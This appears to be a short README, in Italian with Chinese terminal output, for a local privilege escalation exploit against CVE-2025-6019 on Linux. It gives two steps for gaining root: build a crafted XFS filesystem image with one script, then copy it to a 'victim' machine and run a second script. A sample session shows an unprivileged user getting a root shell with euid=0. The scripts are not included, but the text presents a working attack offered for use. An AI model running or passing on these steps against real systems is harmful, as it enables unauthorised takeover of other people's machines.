
Exploit di escalation dei privilegi locali per CVE-2025-6019 utilizzando immagini XFS del filesystem create appositamente per ottenere accesso root shell su sistemi Linux.
Primo passo: esegui 1.sh su un dispositivo Linux per costruire xfs.image
Secondo passo: trasferisci xfs.image sul dispositivo vittima ed esegui 2.sh. Di seguito un esempio di successo:
neko@aosc-neko205 [ tmp ] $ bash 2.sh
当前用户: neko
uid=1000(neko) gid=1001(neko) 组=1001(neko),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1002(gamemode)
('yes',)
Mapped file /home/neko/xfs.image as /dev/loop0.
成功找到 Root Shell: /tmp/blockdev.IK6D92/root-shell
正在提权...
root-shell-5.2# id
uid=1000(neko) gid=1001(neko) euid=0(root) 组=1001(neko),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1002(gamemode)
root-shell-5.2#